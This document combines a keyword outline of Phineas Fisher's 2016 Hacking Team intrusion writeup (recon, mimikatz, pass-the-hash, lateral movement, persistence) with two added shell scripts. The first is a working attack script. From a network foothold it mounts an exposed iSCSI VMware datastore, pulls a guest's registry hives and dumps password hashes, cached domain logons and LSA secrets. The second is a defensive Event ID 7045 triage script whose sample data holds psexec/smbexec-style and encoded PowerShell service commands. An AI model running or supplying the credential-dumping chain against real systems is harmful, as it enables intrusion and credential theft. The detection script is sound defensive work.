Hacking Team Writeup
by Phineas Fisher (2016)
Remark |
---|
#antisec |
Phineas is disgusted by “sellouts” |
Hacking Team |
Tor isn’t a panacea |
OPSEC considerations |
Whonix, Tails, Qubes TorVM |
wifislax - wifi cracking distro |
VPN |
Jeremy Hammond busted by correlating home address w/ VPN |
don't hack directly from Tor - exit nodes are blacklisted |
DNS tunneling |
command and control |
connect-back shells |
stable servers |
hacked servers |
pay for VPS with Bitcoin |
attribution |
APT |
code and TTP reuse as attribution |
public tools as plausible deniability |
changing tactics to avoid being profiled |
“Google Hacking for Penetration Testers” |
subdomain enumeration |
fierce |
theHarvester |
recon-ng |
whois + reverse whois |
site:domaintools.com |
site:www.find-ip-address.com |
port scanning |
service fingerprinting |
IDS |
“the whole internet is being scanned constantly” |
nmap |
zmap |
masscan |
WhatWeb |
BlindElephant |
social engineering |
data.com (Jigsaw) |
file metadata |
metagoofil |
FOCA (metadata) |
foothold |
try easy, common techniques first |
spear phishing |
targeted attacks |
buying access |
Joomla |
Joomscan |
VPN appliances |
0-day |
postfix |
reverse engineering |
leveraging bugs in embedded devices |
backdoored firmware |
post exploitation |
backdoor |
busybox |
Responder.py |
Python |
tcpdump |
dsniff |
socat |
GNU screen |
SOCKS proxy |
tgcd |
testing tools and attack kits prior to use |
Responder.py -A |
NoSQL |
MySQL authentication bypass |
mongodb |
RCS |
GridFS |
torrent |
Shodan |
insecure backups |
iSCSI |
Synology |
NAS |
port forwarding |
iscsiadm |
iptables |
vmfs-fuse |
losetup |
fdisk |
mount |
VHD |
pwdump |
cachedump |
lsadump |
registry hives |
proxychains |
smbclient |
Metasploit |
psexec.ps1 |
meterpreter |
process migration |
“load kiwi” |
“creds_wdigest” |
Domain Admin |
PowerShell |
New-MailboxExportRequest |
Microsoft Exchange |
lateral movement |
mimikatz |
sekurlsa::logonpasswords |
sekurlsa::msv |
runas |
PowerUp |
bypassuac |
privilege escalation |
psexec |
WMI |
winexe |
PowerShell Empire invoke-psexec |
sc.exe |
pth-winexe |
Event ID 7045 “Service Control Manager” |
Event Logs |
wmiexec.py |
pth-wmis |
pass the hash |
wmic |
PSRemoting |
don't recommend opening new protocols |
Windows 10 |
Scheduled Task |
schtasks.exe |
GPO |
GPO logon script |
GPO install msi |
GPO scheduled task |
token stealing - mimikatz token::xxx |
MS14-068 |
Kerberos |
Domain Admin Tickets |
sekurlsa::pth |
process injection |
RAT |
pupy_migrate command |
pupy |
meterpreter-migrate |
psinject_empire |
persistence |
Duqu 2-style persistence |
high uptime servers as targets |
golden ticket |
backup access |
PowerView |
Windows 2000, 2003 lacking PowerShell |
netview.exe |
net view |
Invoke-ShareFinderThreaded |
Select-String |
Out-File |
reading email |
reading SharePoint |
Active Directory |
Nagios |
Get-Keystrokes |
Get-TimedScreenshot |
PowerSploit |
Do-Exfiltration |
nishang |
hunting sysadmins |
CredMan.ps1 |
searching for interesting files |
TrueCrypt volumes |
weak passwords |
passwords.txt |
git repos |
sudo |
password reuse |
GitLab |
“forgot my password” + mailserver access |
ethical hacking |
encrypted email - GPG/PGP |
Enigmail |
Links |
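
The rows iSCSI, Synology, NAS, port forwarding, iscsiadm, iptables, vmfs-fuse, losetup, fdisk, mount, pwdump, cachedump, lsadump and registry hives describe one chain: reach an exposed iSCSI LUN, mount the VMware datastore on it, loop-mount a guest's disk image and pull the registry hives for offline dumping. The script below is an added example, my own code rather than anything from the writeup or its author, that strings those steps together. The portal address, datastore paths, partition number, mount points and the creddump command names are assumptions; it presumes the NAS's iSCSI port has already been forwarded to this host (iptables DNAT on a foothold or a socat relay) and that open-iscsi, vmfs-tools, util-linux, ntfs-3g and creddump are installed.

```shell
#!/bin/sh
# Added example (not from the Hacking Team writeup): iSCSI LUN -> VMFS datastore
# -> guest flat vmdk -> NTFS partition -> SAM/SYSTEM/SECURITY -> creddump.
# Assumptions: the NAS's iSCSI port is already forwarded to $PORTAL on this
# box; iscsiadm, vmfs-fuse, losetup/fdisk/mount, ntfs-3g and creddump's
# pwdump.py/cachedump.py/lsadump.py are installed; you are root.
# DRY_RUN=1 prints every command instead of executing it.

PORTAL="${PORTAL:-127.0.0.1:3260}"     # forwarded iSCSI portal (assumed)
VMDK="${VMDK:-dc01/dc01-flat.vmdk}"    # guest's flat vmdk, relative to the datastore root (assumed)
PART="${PART:-2}"                      # partition holding \Windows inside that disk (1 is often the boot partition)
WORK="${WORK:-/mnt/ht}"                # scratch mount points (assumed)

run() { if [ "${DRY_RUN:-0}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi; }

mount_datastore() {   # $1: the VMFS partition the LUN exposes, e.g. /dev/sdb1
    run iscsiadm -m discovery -t sendtargets -p "$PORTAL"
    run iscsiadm -m node -p "$PORTAL" --login          # LUN appears as a new /dev/sdX
    run mkdir -p "$WORK/vmfs" "$WORK/guest" "$WORK/hives"
    run vmfs-fuse "$1" "$WORK/vmfs"                     # datastore contents now readable as files
}

# Byte offset of partition $2 of disk $1, parsed from `fdisk -l` output on stdin.
# Copes with the boot-flag column ("*") and with non-512-byte sector sizes.
parse_part_offset() {
    awk -v want="${1}p${2}" '
        /^Units:/  { ss = $(NF-1) }
        $1 == want { s = ($2 == "*") ? $3 : $2; printf "%d\n", s * (ss ? ss : 512); exit }'
}

pull_hives() {        # loop-mount the guest NTFS read-only and copy the hives out
    if [ "${DRY_RUN:-0}" = 1 ]; then
        loop=/dev/loopN; off='<offset>'
    else
        loop=$(losetup -f --show -r "$WORK/vmfs/$VMDK")          # read-only loop device for fdisk
        off=$(fdisk -l "$loop" | parse_part_offset "$loop" "$PART")
        losetup -d "$loop"
        [ -n "$off" ] || { echo "partition $PART not found in $VMDK" >&2; return 1; }
    fi
    # util-linux handles loop+offset itself, so ntfs-3g only ever sees the partition
    run mount -t ntfs-3g -o ro,loop,offset="$off" "$WORK/vmfs/$VMDK" "$WORK/guest"
    for h in SAM SYSTEM SECURITY; do
        run cp "$WORK/guest/Windows/System32/config/$h" "$WORK/hives/$h"
    done
}

dump_creds() {        # creddump: local account hashes, cached domain logons, LSA secrets
    run pwdump.py    "$WORK/hives/SYSTEM" "$WORK/hives/SAM"
    run cachedump.py "$WORK/hives/SYSTEM" "$WORK/hives/SECURITY"
    run lsadump.py   "$WORK/hives/SYSTEM" "$WORK/hives/SECURITY"
}

main() { mount_datastore "$1"; pull_hives; dump_creds; }

case "${1:-}" in
    "") ;;                 # no argument: only define the functions (sourcing, tests)
    *)  main "$1" ;;
esac
```

Everything is mounted read-only (`losetup -r`, `mount -o ro`, and vmfs-fuse is read-only anyway), which matters when the LUN is a live datastore rather than one of the insecure backups the writeup's rows mention. `DRY_RUN=1 ./mount_ht.sh /dev/sdb1` prints the full command sequence so it can be checked before touching anything.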
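
The rows Event ID 7045 "Service Control Manager" and Event Logs point at the artifact that sc.exe, psexec, winexe and the Empire/Metasploit psexec modules leave on the target: a service-install record in the System log. As an added example, not from the writeup, here is a triage script for such records on the defender's side. It assumes (my assumption, not the page's) that the 7045 events were exported as tab-separated text with the columns TimeCreated, Computer, ServiceName, ImagePath, AccountName; the sample records it ships with are constructed for the demo, not real telemetry.

```shell
#!/bin/sh
# Added example (not from the Hacking Team writeup): flag Event ID 7045
# ("A service was installed in the system") records that look like psexec-style
# lateral movement. Input: tab-separated export, one record per line, columns
#   TimeCreated  Computer  ServiceName  ImagePath  AccountName
# (assumed layout; adjust the $3/$4 field numbers if your export differs).

flag_7045() {   # $1: TSV file. Prints "<reason><TAB><record>" for each suspicious install.
    awk -F '\t' '
        NR == 1 && $1 == "TimeCreated" { next }               # skip a header line if present
        {
            name = $3; path = tolower($4); reason = ""
            if (toupper(name) == "PSEXESVC")
                reason = "sysinternals PsExec service"
            else if (path ~ /%comspec%|cmd\.exe/ && path ~ / \/c /)
                reason = "cmd one-liner as service binary (smbexec / psexec_psh style)"
            else if (path ~ /powershell/ && path ~ / -e(c|nc|ncodedcommand)? /)
                reason = "encoded PowerShell as service binary"
            else if (path ~ /\\windows\\temp\\|\\admin\$\\/)
                reason = "service binary dropped in Temp or via ADMIN$"
            if (reason != "") print reason "\t" $0
        }' "$1"
}

rec() { printf '%s\t%s\t%s\t%s\t%s\n' "$@"; }

write_sample_7045() {   # constructed demo records (not real logs) -> file $1
    {
        rec TimeCreated Computer ServiceName ImagePath AccountName
        rec '2016-07-05 09:00:00' WS07 gupdate '"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc' LocalSystem
        rec '2016-07-06 03:12:44' WS01 PSEXESVC '%SystemRoot%\PSEXESVC.exe' LocalSystem
        rec '2016-07-06 03:15:02' DC01 BTOBTO '%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat' LocalSystem
        rec '2016-07-06 03:20:17' FS02 WinDefendUpdate 'powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' LocalSystem
        rec '2016-07-05 10:30:00' WS07 Sysmon 'C:\Windows\Sysmon.exe' LocalSystem
        rec '2016-07-06 03:30:55' WS03 svchelper 'C:\Windows\Temp\svchelper.exe' LocalSystem
    } > "$1"
}

case "${1:-}" in
    "")     ;;                                                  # no args: define functions only
    --demo) f=$(mktemp); write_sample_7045 "$f"; flag_7045 "$f"; rm -f "$f" ;;
    *)      flag_7045 "$1" ;;
esac
```

On the demo data this flags four of the six records (PsExec, the smbexec-style cmd one-liner, the encoded PowerShell service, the binary in \Windows\Temp) and leaves the Google updater and Sysmon alone. These patterns only catch the tools' defaults; an attacker who renames the service and drops the binary somewhere plausible walks past all four, so the durable control is a per-host baseline of 7045 service names with an alert on any unseen name, correlated with the network logon (4624, logon type 3) that preceded it.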